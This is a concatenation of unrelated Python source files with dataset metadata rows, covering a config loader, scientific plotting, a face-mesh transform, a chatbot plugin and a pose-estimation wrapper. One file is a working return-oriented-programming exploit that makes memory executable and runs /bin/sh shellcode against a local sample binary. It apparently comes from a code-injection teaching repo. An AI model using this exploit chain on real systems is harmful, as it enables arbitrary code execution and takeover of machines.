os.remove("config.ini")
print(f"#. Generating new default config file")
create_config()
            return load_config()
else:
print(f"#. Creating new config file.")
print(f"#. Generating new default config file")
create_config()
        return load_config()
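# Typical call site (a sketch, not part of the original module):
# config = load_config()
# print(config['parentdirectory'], config['extensions'])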
| 39.853333 | 378 | 0.535296 | 257 | 2,989 | 6.171206 | 0.249027 | 0.08512 | 0.045397 | 0.026482 | 0.240227 | 0.240227 | 0.225725 | 0.225725 | 0.225725 | 0.225725 | 0 | 0.001952 | 0.314486 | 2,989 | 74 | 379 | 40.391892 | 0.772084 | 0.005018 | 0 | 0.328358 | 0 | 0 | 0.352545 | 0.035389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.029851 | 0 | 0.074627 | 0.119403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c21c741d82fa74f710995093499f55871ed220f | 481 | py | Python | tests/unit/preprocessor/_derive/test_lai_grid.py | Peter9192/ESMValCore | febd96a39480cc837afbf4e1f5b0ef61571af76a | [
"Apache-2.0"
] | null | null | null | tests/unit/preprocessor/_derive/test_lai_grid.py | Peter9192/ESMValCore | febd96a39480cc837afbf4e1f5b0ef61571af76a | [
"Apache-2.0"
] | null | null | null | tests/unit/preprocessor/_derive/test_lai_grid.py | Peter9192/ESMValCore | febd96a39480cc837afbf4e1f5b0ef61571af76a | [
"Apache-2.0"
] | null | null | null | """Test derivation of `lai_grid`."""
import mock
import esmvalcore.preprocessor._derive.lai_grid as lai_grid
CUBES = 'mocked cubes'
STD_NAME = 'leaf_area_index'
@mock.patch.object(lai_grid, 'grid_area_correction', autospec=True)
def test_lai_grid_calculation(mock_grid_area_correction):
"""Test calculation of `lai_grid."""
derived_var = lai_grid.DerivedVariable()
derived_var.calculate(CUBES)
mock_grid_area_correction.assert_called_once_with(CUBES, STD_NAME)
| 30.0625 | 70 | 0.787942 | 68 | 481 | 5.176471 | 0.485294 | 0.139205 | 0.153409 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 481 | 15 | 71 | 32.066667 | 0.820513 | 0.126819 | 0 | 0 | 0 | 0 | 0.114914 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c21f6f7f129be11973a59130ba1d0c9a5694b3f | 4,390 | py | Python | transform_mesh.py | yinguobing/image_utility | 17726335d2ce64a3b799dc0b7416f40ff928f805 | [
"MIT"
] | 69 | 2018-02-08T11:54:20.000Z | 2021-12-08T09:39:06.000Z | transform_mesh.py | yinguobing/image_utility | 17726335d2ce64a3b799dc0b7416f40ff928f805 | [
"MIT"
] | 9 | 2018-10-22T10:38:37.000Z | 2021-09-10T18:37:32.000Z | transform_mesh.py | yinguobing/image_utility | 17726335d2ce64a3b799dc0b7416f40ff928f805 | [
"MIT"
] | 47 | 2018-03-21T05:10:52.000Z | 2022-03-04T03:41:48.000Z | import cv2
import json
import numpy as np
from matplotlib import pyplot
image_file = "/home/robin/Desktop/sample/helen-trainset-1010057391_1.jpg"
ibug_file = "/home/robin/Desktop/sample/helen-trainset-1010057391_1.json"
mesh_file = "/home/robin/Desktop/sample/helen-trainset-1010057391_1_m468.json"
epn_width = 20
def get_distance(point1, point2):
"""Calculate the distance between two points."""
return np.linalg.norm(point2 - point1)
def get_angle(vector2, vector1):
"""Return the angel between two vectors."""
d = np.dot(vector1, vector2)
cos_angle = d / (np.linalg.norm(vector1) * np.linalg.norm(vector2))
if cos_angle > 1.0:
angle = 0
elif cos_angle < -1.0:
angle = np.pi
else:
angle = np.arccos(cos_angle)
return angle
def rotate(points, radius, center):
"""Rotate the points by angle"""
    _points = points - np.array(center, dtype=float)
cos_angle = np.cos(radius)
sin_angle = np.sin(radius)
rotaion_matrix = np.array([[cos_angle, sin_angle],
[-sin_angle, cos_angle]])
return np.dot(_points, rotaion_matrix) + center
if __name__ == "__main__":
# Read in the image.
image = pyplot.imread(image_file)
# Read in the IBUG marks.
with open(ibug_file, 'r') as f:
data = json.load(f)
ibug_points = np.reshape(data, (-1, 2)) * 128
# Read in the MESH points.
with open(mesh_file, 'r') as f:
data = json.load(f)
mesh_points = np.reshape(data, (-1, 3)) * (128 + epn_width * 2)
# The IBUG data are manually annotated, which I believe could be used to
# calibrate the mesh points. Here are some points of interest that is more
# stable than others. They are:
# * left eye left corner
# * left eye right corner
# * right eye left corner
# * right eye right corner
# * mouse left corner
# * mouse right corner
anchor_points_ibug = np.array([ibug_points[36],
ibug_points[39],
ibug_points[42],
ibug_points[45],
ibug_points[48],
ibug_points[54]], np.float32)
anchor_points_mesh = np.array([mesh_points[33],
mesh_points[133],
mesh_points[362],
mesh_points[263],
mesh_points[78],
mesh_points[308]], np.float32)
# The mesh are of 3D dimensions.
anchor_points_mesh = anchor_points_mesh[:, :2]
mesh_to_transform = mesh_points[:, :2]
# TODO: transform the mesh points.
# 1. scale
scale = 0.5
mesh_transformed = mesh_to_transform * scale
# 2. translation
# 3. rotation
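    # A hedged sketch of steps 2 and 3 using the helpers defined above (kept
    # commented out: one possible completion, not the author's final method;
    # the anchor-based scale below would also replace the hard-coded 0.5):
    # scale = (get_distance(anchor_points_ibug[0], anchor_points_ibug[3]) /
    #          get_distance(anchor_points_mesh[0], anchor_points_mesh[3]))
    # translation = anchor_points_ibug.mean(axis=0) - anchor_points_mesh.mean(axis=0) * scale
    # mesh_transformed = mesh_to_transform * scale + translation
    # angle = get_angle(anchor_points_ibug[3] - anchor_points_ibug[0],
    #                   anchor_points_mesh[3] - anchor_points_mesh[0])
    # mesh_transformed = rotate(mesh_transformed, angle, anchor_points_ibug.mean(axis=0))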
# Draw IBUG marks.
fig_ibug = pyplot.figure()
ibug_plot = fig_ibug.add_subplot(111)
ibug_plot.imshow(image)
ibug_lines = ibug_plot.plot(ibug_points[:, 0], ibug_points[:, 1],
color='yellow', marker='.',
linestyle='None', markersize=6)
ibug_plot.plot(anchor_points_ibug[:, 0], anchor_points_ibug[:, 1],
color='blue', marker='.',
linestyle='None', markersize=6)
# Draw mesh marks.
fig_mesh = pyplot.figure()
mesh_plot = fig_mesh.add_subplot(111)
image = cv2.copyMakeBorder(image,
epn_width, epn_width, epn_width, epn_width,
cv2.BORDER_CONSTANT, value=[0, 0, 0])
mesh_plot.imshow(image)
mesh_lines = mesh_plot.plot(mesh_points[:, 0], mesh_points[:, 1],
color='yellow', marker='.',
linestyle='None', markersize=3)
mesh_plot.plot(anchor_points_mesh[:, 0], anchor_points_mesh[:, 1],
color='blue', marker='.',
linestyle='None', markersize=6)
# Draw transformed mesh.
fig_mesh = pyplot.figure()
t_mesh_plot = fig_mesh.add_subplot(111)
t_mesh_plot.imshow(image)
t_mesh_lines = t_mesh_plot.plot(mesh_transformed[:, 0], mesh_transformed[:, 1],
color='yellow', marker='.',
linestyle='None', markersize=3)
pyplot.show()
| 34.84127 | 83 | 0.56492 | 536 | 4,390 | 4.421642 | 0.281716 | 0.054852 | 0.033755 | 0.061181 | 0.243038 | 0.21308 | 0.199578 | 0.175949 | 0.100422 | 0 | 0 | 0.045118 | 0.323462 | 4,390 | 125 | 84 | 35.12 | 0.752862 | 0.146697 | 0 | 0.177215 | 0 | 0 | 0.065212 | 0.048774 | 0 | 0 | 0 | 0.008 | 0 | 1 | 0.037975 | false | 0 | 0.050633 | 0 | 0.126582 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c22a331581c5541b0a0b652eb8d6141c491cf4b | 4,970 | py | Python | plot/plot_dm_profiles.py | diamondjems016/galaxy_analysis | fa1367085a6b9870de2546daf3163aaa41129ea0 | [
"MIT"
] | 1 | 2021-01-15T15:33:05.000Z | 2021-01-15T15:33:05.000Z | plot/plot_dm_profiles.py | diamondjems016/galaxy_analysis | fa1367085a6b9870de2546daf3163aaa41129ea0 | [
"MIT"
] | null | null | null | plot/plot_dm_profiles.py | diamondjems016/galaxy_analysis | fa1367085a6b9870de2546daf3163aaa41129ea0 | [
"MIT"
] | 1 | 2020-11-29T00:15:25.000Z | 2020-11-29T00:15:25.000Z | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
#
from dwarfs.analysis.initial_conditions import ic_list as icl
from galaxy_analysis.plot.plot_styles import *

colors = [orange, magenta, purple, black]
ls = ['-', '-', '-', '-']

#
# Get the 4 Leo P galaxy IC's
#
run11_largebox = icl.ic_object_dict['Leo_P']
run11_2rs = icl.ic_object_dict['Leo_P_2rs']
run11_30km = icl.ic_object_dict['Leo_P_30km']
run11_40km = icl.ic_object_dict['Leo_P_40km']

galaxies = [run11_largebox, run11_2rs, run11_30km, run11_40km]
labels = ['17', '25', '30', '40']
for i in np.arange(len(labels)):
    labels[i] = r'v$_{\rm c,max}$ = ' + labels[i] + r' km s$^{-1}$'
print(labels)


def overplot_radius(ax, gal, color='black', ls='--',
                    virial=False, rtype='b'):
    if virial:
        norm = gal.ic['R200']
    else:
        norm = icl.cgs.kpc

    ylim = ax.get_ylim()
    x = [gal.ic[rtype] / norm, gal.ic[rtype] / norm]
    ax.plot(x, ylim, lw=line_width * 0.75, color=color, ls=ls)
    ax.set_ylim(ylim)
    return


def plot_dm_profiles(virial=False, dm_unit=1.0):
    #
    # Plot dark matter density as a function of radius
    #
    fig, ax = plt.subplots()

    if virial:
        r = np.logspace(-4, 0)  # in virial radius
    else:
        r = np.logspace(-3, 2)

    ax.loglog()
    for i, g in enumerate(galaxies):
        if virial:
            x = r * g.ic['R200']
        else:
            x = r * icl.cgs.kpc
        ax.plot(r, g.DM_density(x) * dm_unit,
                lw=line_width, color=colors[i], ls=ls[i],
                label=labels[i])

    # for i, g in enumerate(galaxies):
    #     overplot_scale_radius(ax, g, color=colors[i], ls='--', virial=virial)

    # ax.set_xlim(-4, 0)
    # ax.set_ylim()
    if virial:
        ax.set_xlabel(r'log[R / R$_{\rm vir}$]')
    else:
        ax.set_xlabel(r'R (kpc)')

    ax.legend(loc='best')

    if dm_unit == 1.0:
        outname = 'dark_matter_density'
        ax.set_ylabel(r'Dark Matter Density (g cm$^{-3}$)')
    else:
        ax.set_xlim(0.01, 40)
        ax.set_ylim(1.0E3, 6.0E8)
        ax.set_ylabel(r'Dark Matter Density (M$_{\odot}$ kpc$^{-3}$)')
        outname = 'dark_matter_density_Msun_kpc'

    for i, g in enumerate(galaxies):
        overplot_radius(ax, g, color=colors[i], ls='--', virial=virial)
        overplot_radius(ax, g, color=colors[i], ls='--', virial=virial, rtype='R200')

    fig.set_size_inches(8, 8)
    plt.tight_layout()

    if virial:
        outname += '_virial'
    plt.savefig(outname + '.png')
    return


def plot_mass_profiles(virial):
    fig, ax = plt.subplots()

    if virial:
        r = np.logspace(-4, 0)  # in virial radius
    else:
        r = np.logspace(-3, 2)

    ax.loglog()
    for i, g in enumerate(galaxies):
        if virial:
            x = r * g.ic['R200']
        else:
            x = r * icl.cgs.kpc
        ax.plot(r, g.M_r(x) / icl.cgs.Msun,
                lw=line_width, color=colors[i], ls=ls[i],
                label=labels[i])

    for i, g in enumerate(galaxies):
        overplot_radius(ax, g, color=colors[i], ls='--', virial=virial)

    # ax.set_xlim(-4, 0)
    # ax.set_ylim()
    if virial:
        ax.set_xlabel(r'log[R / R$_{\rm vir}$]')
    else:
        ax.set_xlabel(r'R (kpc)')
    ax.set_ylabel(r'Cumulative Mass (M$_{\odot}$)')
    ax.legend(loc='best')

    fig.set_size_inches(8, 8)
    plt.tight_layout()

    outname = 'dark_matter_mass'
    if virial:
        outname += '_virial'
    plt.savefig(outname + '.png')
    return


def plot_circular_velocity_profiles(virial):
    fig, ax = plt.subplots()

    if virial:
        r = np.logspace(-4, 0)  # in virial radius
    else:
        r = np.logspace(-3, 2)

    ax.loglog()
    for i, g in enumerate(galaxies):
        if virial:
            x = r * g.ic['R200']
        else:
            x = r * icl.cgs.kpc
        ax.plot(r, g.circular_velocity(x) / 1.0E5,
                lw=line_width, color=colors[i], ls=ls[i],
                label=labels[i])

    for i, g in enumerate(galaxies):
        overplot_radius(ax, g, color=colors[i], ls='--',
                        virial=virial)

    # ax.set_xlim(-4, 0)
    # ax.set_ylim()
    if virial:
        ax.set_xlabel(r'log[R / R$_{\rm vir}$]')
    else:
        ax.set_xlabel(r'R (kpc)')
    ax.set_xlim(0.01, 40.0)
    ax.set_ylabel(r'V$_{\rm c}$ (km s$^{-1}$)')
    ax.legend(loc='best')

    fig.set_size_inches(8, 8)
    plt.tight_layout()

    outname = 'circular_velocity'
    if virial:
        outname += '_virial'
    plt.savefig(outname + '.png')
    return


if __name__ == '__main__':
    for virial in [True, False]:
        plot_dm_profiles(virial)
        plot_dm_profiles(virial, dm_unit=icl.cgs.kpc**3 / icl.cgs.Msun)
        plot_mass_profiles(virial)
        plot_circular_velocity_profiles(virial)
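
# --- Editor's sketch (not from the original module): the galaxy IC objects'
# --- DM_density(r) presumably evaluates an analytic halo profile; an NFW-like
# --- form is shown here purely for illustration (this is an assumption):
#
# def nfw_density(r, rho_0, r_s):
#     """NFW profile: rho(r) = rho_0 / ((r/r_s) * (1 + r/r_s)**2)."""
#     return rho_0 / ((r / r_s) * (1.0 + r / r_s) ** 2)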
| 24.482759 | 93 | 0.551107 | 723 | 4,970 | 3.625173 | 0.183956 | 0.038153 | 0.036627 | 0.042732 | 0.611599 | 0.592522 | 0.55475 | 0.532621 | 0.532621 | 0.50248 | 0 | 0.03166 | 0.294567 | 4,970 | 202 | 94 | 24.60396 | 0.715916 | 0.068008 | 0 | 0.613636 | 0 | 0 | 0.100369 | 0.00607 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.037879 | 0 | 0.098485 | 0.007576 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c23f513292b5a4c00b4d1b74cca6e4b7ac22835 | 1,199 | py | Python | main.py | jendelel/rhl-algs | d5b8779d7e271265d4f0bfcb3602bc56958e3eb3 | [
"Apache-2.0"
] | 2 | 2019-03-30T23:29:10.000Z | 2019-04-05T21:54:21.000Z | main.py | jendelel/rhl-algs | d5b8779d7e271265d4f0bfcb3602bc56958e3eb3 | [
"Apache-2.0"
] | 3 | 2019-03-29T11:23:17.000Z | 2020-12-28T02:00:17.000Z | main.py | jendelel/rhl-algs | d5b8779d7e271265d4f0bfcb3602bc56958e3eb3 | [
"Apache-2.0"
] | null | null | null | import argparse
import functools
from ui import MainWindow, create_app
import time
from gym_utils import make_env, toggle_recording

running = False


def startRl(window):
    global running
    if running:
        return
    running = True

    parser = argparse.ArgumentParser(description='Reinforcement human learning')
    parser.add_argument('--alg', type=str, default="random_alg", help='Name of RL algorithm.')
    parser.add_argument('--env', type=str, default="CartPole-v0", help='Name of Gym environment.')
    parser.add_argument('--seed', type=int, default=543, help='random seed (default: 543)')
    alg, args = window.loadAlg(parser)

    env = make_env(args.env, window.viewer, alg_name=args.alg, record=window.recordCheck.isChecked())
    window.recordCheck.stateChanged.connect(functools.partial(toggle_recording, env_object=env))
    print(args)
    env.seed(args.seed)
    window.viewer.start_time = time.time()
    alg.start(window, args, env)
    running = True


def main():
    app = create_app()
    window = MainWindow()
    window.startBut.clicked.connect(functools.partial(startRl, window=window))
    window.show()
    app.exec_()


if __name__ == "__main__":
    main()
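
# Usage sketch (editor's note, derived from the argparse defaults above):
#   python main.py --alg random_alg --env CartPole-v0 --seed 543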
| 29.243902 | 101 | 0.711426 | 154 | 1,199 | 5.38961 | 0.422078 | 0.03253 | 0.061446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006979 | 0.16347 | 1,199 | 40 | 102 | 29.975 | 0.820538 | 0 | 0 | 0.064516 | 0 | 0 | 0.1201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.16129 | 0 | 0.258065 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c2bb6940e12c9d5333e4245d234d46a912ce462 | 628 | py | Python | setup.py | leftstache/repeat-cli | b959b549f7aeb8c512f67d32a95c303ff384b229 | [
"Apache-2.0"
] | null | null | null | setup.py | leftstache/repeat-cli | b959b549f7aeb8c512f67d32a95c303ff384b229 | [
"Apache-2.0"
] | null | null | null | setup.py | leftstache/repeat-cli | b959b549f7aeb8c512f67d32a95c303ff384b229 | [
"Apache-2.0"
] | null | null | null | import os
from distutils.core import setup


def get_packages(root_dir):
    packages = []
    for root, dirs, files in os.walk(root_dir):
        if "__init__.py" in files:
            packages.append(root.replace('/', '.'))
    return packages


setup(
    name='repeat-cli',
    version='1.0.1',
    author='Joel Johnson',
    author_email='joelj@joelj.com',
    packages=['repeat_cli'],
    scripts=['repeat'],
    data_files=['README.md'],
    url='https://github.com/leftstache/repeat',
    license='Apache 2.0',
    description='Repeats a command',
    long_description=open('README.md').read(),
    install_requires=[]
) | 24.153846 | 51 | 0.633758 | 80 | 628 | 4.825 | 0.675 | 0.036269 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00996 | 0.200637 | 628 | 26 | 52 | 24.153846 | 0.758964 | 0 | 0 | 0 | 0 | 0 | 0.241653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c2bcc7e5deb8f99d5bb937671a2d4a737486da5 | 2,116 | py | Python | golang-code-injection/exploit_rop.py | tamilmaran-7/samples | ba52f06fa7bcf3da88d833eba677624ee253999a | [
"Apache-2.0"
] | 1 | 2022-03-15T07:20:59.000Z | 2022-03-15T07:20:59.000Z | golang-code-injection/exploit_rop.py | tamilmaran-7/samples | ba52f06fa7bcf3da88d833eba677624ee253999a | [
"Apache-2.0"
] | null | null | null | golang-code-injection/exploit_rop.py | tamilmaran-7/samples | ba52f06fa7bcf3da88d833eba677624ee253999a | [
"Apache-2.0"
] | 4 | 2022-02-07T06:42:32.000Z | 2022-03-17T07:30:10.000Z | #!/usr/bin/env python2
from pwn import *
import sys

GDB_MODE = len(sys.argv) > 1 and sys.argv[1] == '--gdb'

if not GDB_MODE:
    c = process("./main")

# gadgets (use ropper to find them)
eax0 = 0x0000000000462fa0     # mov eax, 0; ret;
syscall = 0x0000000000464609  # syscall; ret;
poprax = 0x000000000040ebef   # pop rax; or dh, dh; ret;
poprsi = 0x000000000041694f   # pop rsi; adc al, 0xf6; ret;
poprdi = 0x000000000040ffbd   # pop rdi; dec dword ptr [rax + 0x21]; ret;
poprdx = 0x0000000000467815   # pop rdx; xor ah, byte ptr [rsi - 9]; ret;

# addresses
buf = 0x00541000    # use vmmap in GDB to find it
dummy = 0x00557000  # heap

# syscall nums
mprotect = 0xa
read = 0x0

# put it together
# padding
payload = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN"

# mark memory page at buf rwx
payload += p64(poprax)   # dec dword ptr in poprdi mitigation
payload += p64(dummy)
payload += p64(poprdi)   # 1ST ARGUMENT
payload += p64(buf)      # ADDRESS
payload += p64(poprsi)   # xor ah, byte ptr in poprdx mitigation
payload += p64(dummy)
payload += p64(poprdx)   # 3RD ARGUMENT
payload += p64(0x7)      # RWX
payload += p64(poprsi)   # 2ND ARGUMENT
payload += p64(0x100)    # SIZE
payload += p64(poprax)   # SET RAX = 0
payload += p64(0xa)      # SET RAX = 10
payload += p64(syscall)  # SYSCALL

# read into buf
payload += p64(poprax)   # dec dword ptr in poprdi mitigation
payload += p64(dummy)
payload += p64(poprdi)   # 1ST ARGUMENT
payload += p64(0x0)      # STDIN
payload += p64(poprsi)   # xor ah, byte ptr in poprdx mitigation
payload += p64(dummy)
payload += p64(poprdx)   # 3RD ARGUMENT
payload += p64(0x100)    # SIZE
payload += p64(poprsi)   # 2ND ARGUMENT
payload += p64(buf)      # ADDRESS
payload += p64(eax0)     # SET RAX = 0
payload += p64(syscall)  # SYSCALL

# jump into buf
payload += p64(buf)

# machine instructions to spawn /bin/sh
# http://shell-storm.org/shellcode/files/shellcode-806.php
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# send it
if GDB_MODE:
    print(payload + shellcode)
else:
    c.sendline(payload)
    c.sendline(shellcode)
    c.interactive()
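
# Editor's note (not in the original): pwntools' p64 packs a little-endian
# 64-bit value, i.e. p64(v) == struct.pack('<Q', v), which is why each gadget
# address and argument above occupies exactly 8 bytes on the forged stack.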
| 26.78481 | 122 | 0.701323 | 310 | 2,116 | 4.777419 | 0.451613 | 0.175557 | 0.072924 | 0.067522 | 0.375422 | 0.352465 | 0.352465 | 0.263336 | 0.263336 | 0.263336 | 0 | 0.13595 | 0.169187 | 2,116 | 78 | 123 | 27.128205 | 0.706485 | 0.365785 | 0 | 0.44898 | 0 | 0.020408 | 0.134512 | 0.126057 | 0 | 0 | 0.117602 | 0 | 0 | 1 | 0 | false | 0 | 0.040816 | 0 | 0.040816 | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c2ec73630740430e6e366707961c81fce5309c7 | 1,336 | py | Python | src/facedetectmodule.py | Pritam-N/mediapipeface | 5e14c43d74c655b99b5f74640cf5ecb941765658 | [
"MIT"
] | 1 | 2021-09-29T17:26:51.000Z | 2021-09-29T17:26:51.000Z | src/facedetectmodule.py | Pritam-N/mediapipeface | 5e14c43d74c655b99b5f74640cf5ecb941765658 | [
"MIT"
] | null | null | null | src/facedetectmodule.py | Pritam-N/mediapipeface | 5e14c43d74c655b99b5f74640cf5ecb941765658 | [
"MIT"
] | null | null | null | import cv2
import mediapipe as mp


class FaceDetector():
    def __init__(self) -> None:
        self.mpfacedetect = mp.solutions.face_detection
        self.mpdraw = mp.solutions.drawing_utils
        self.drawspec = self.mpdraw.DrawingSpec(thickness=1, circle_radius=1)

    def faceDetect(self, img):
        with self.mpfacedetect.FaceDetection(
                min_detection_confidence=0.5) as fd:
            self.imgrgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
            self.results = fd.process(self.imgrgb)
            if self.results.detections:
                annotated_image = img.copy()
                for detection in self.results.detections:
                    self.mpdraw.draw_detection(annotated_image, detection)
                return annotated_image
        return img


def main(path='PATHTOVIDEO', iswebcam=0):
    if iswebcam:
        cap = cv2.VideoCapture(0)
    else:
        cap = cv2.VideoCapture(path)

    detector = FaceDetector()
    while cap.isOpened():
        success, img = cap.read()
        if not success:
            if iswebcam:
                continue
            break
        annoted = detector.faceDetect(img)
        cv2.imshow("Image", annoted)
        if cv2.waitKey(5) & 0xFF == 27:
            break
    cap.release() | 29.043478 | 78 | 0.571856 | 139 | 1,336 | 5.395683 | 0.496403 | 0.04 | 0.056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020455 | 0.341317 | 1,336 | 46 | 79 | 29.043478 | 0.831818 | 0 | 0 | 0.114286 | 0 | 0 | 0.012384 | 0 | 0 | 0 | 0.003096 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.057143 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c312fd3555966dcaa3bfff67b3acd068ce07388 | 911 | py | Python | plugins/friends.py | dytplay/darkvkbot | c898d1bb52c528e07bf8ad4fd4067578c7dfdbd2 | [
"MIT"
] | null | null | null | plugins/friends.py | dytplay/darkvkbot | c898d1bb52c528e07bf8ad4fd4067578c7dfdbd2 | [
"MIT"
] | null | null | null | plugins/friends.py | dytplay/darkvkbot | c898d1bb52c528e07bf8ad4fd4067578c7dfdbd2 | [
"MIT"
] | null | null | null | from plugin_system import Plugin
from settings import ACCEPT_FRIENDS, IS_GROUP
from utils import schedule_coroutine

if ACCEPT_FRIENDS:
    plugin = Plugin("⛄ Автоматическое добавление друзей (каждые 10 секунд)")

    @plugin.on_init()
    async def get_vk(vk):
        if not IS_GROUP:
            schedule_coroutine(add_friends(vk))

    # Once started (see get_vk for an example of running it in the
    # background), this function runs every 10 seconds until
    # stopper.stop == False.
    #
    # The function must accept one required parameter - stopper - but may
    # accept more.
    @plugin.schedule(10)
    async def add_friends(stopper, vk):
        result = await vk.method("friends.getRequests")

        if not result or not result["count"]:
            return

        users = result["items"]
        for user in users:
            await vk.method("friends.add", {"user_id": user}) | 32.535714 | 80 | 0.672887 | 121 | 911 | 4.966942 | 0.578512 | 0.043261 | 0.046589 | 0.066556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010145 | 0.242591 | 911 | 28 | 81 | 32.535714 | 0.85942 | 0.257958 | 0 | 0 | 0 | 0 | 0.149031 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3437b62b96e573264845ee4e16c710c7e54d96 | 2,168 | py | Python | model_processor.py | Atlas200dk/sample_bodypose | 148000d84a2c51fea9954174cb9a10b1e740ae73 | [
"Apache-2.0"
] | null | null | null | model_processor.py | Atlas200dk/sample_bodypose | 148000d84a2c51fea9954174cb9a10b1e740ae73 | [
"Apache-2.0"
] | 2 | 2020-12-16T07:08:06.000Z | 2020-12-22T07:11:34.000Z | model_processor.py | Atlas200dk/sample_bodypose | 148000d84a2c51fea9954174cb9a10b1e740ae73 | [
"Apache-2.0"
] | 1 | 2022-02-01T16:15:38.000Z | 2022-02-01T16:15:38.000Z | import os
import cv2
import numpy as np
import argparse
import sys

sys.path.append('../')
from src.pose_decode import decode_pose
from acl_model import Model

heatmap_width = 92
heatmap_height = 92


class ModelProcessor:
    def __init__(self, acl_resource, params):
        self._acl_resource = acl_resource
        self.params = params
        self._model_width = params['width']
        self._model_height = params['height']

        assert 'model_dir' in params and params['model_dir'] is not None, 'Review your param: model_dir'
        assert os.path.exists(params['model_dir']), "Model directory doesn't exist {}".format(params['model_dir'])

        # load model from path, and get model ready for inference
        self.model = Model(acl_resource, params['model_dir'])

    def predict(self, img_original):
        # preprocess image to get 'model_input'
        model_input = self.preprocess(img_original)

        # execute model inference
        result = self.model.execute([model_input])

        # postprocessing: use the heatmaps (the second output of the model) to get the joints and limbs for the human body
        # Note: the model has multiple outputs; here we use a simplified method, which only uses the heatmap for body joints,
        # and the heatmap has shape [1,14]: each value corresponds to the position of one of the 14 joints.
        # The value is the index in the 92*92 heatmap (flattened to one dimension)
        heatmaps = result[1]

        # calculate the scale of the original image over the heatmap; Note: img_original.shape[0] is height
        scale = np.array([img_original.shape[1] / heatmap_width, img_original.shape[0] / heatmap_height])

        canvas = decode_pose(heatmaps[0], scale, img_original)
        return canvas

    def preprocess(self, img_original):
        '''
        preprocessing: resize image to model required size, and normalize value between [0,1]
        '''
        scaled_img_data = cv2.resize(img_original, (self._model_width, self._model_height))
        preprocessed_img = np.asarray(scaled_img_data, dtype=np.float32) / 255.
        return preprocessed_img
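
# Editor's sketch (not part of the original class): recovering 2D coordinates
# from the flattened 92x92 heatmap indices described in predict(), assuming
# row-major flattening:
#
#   idx = int(heatmaps[0][0, j])           # flat index for joint j
#   row, col = divmod(idx, heatmap_width)  # position in the 92x92 grid
#   x_img = col * scale[0]                 # scale back to original image
#   y_img = row * scale[1]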
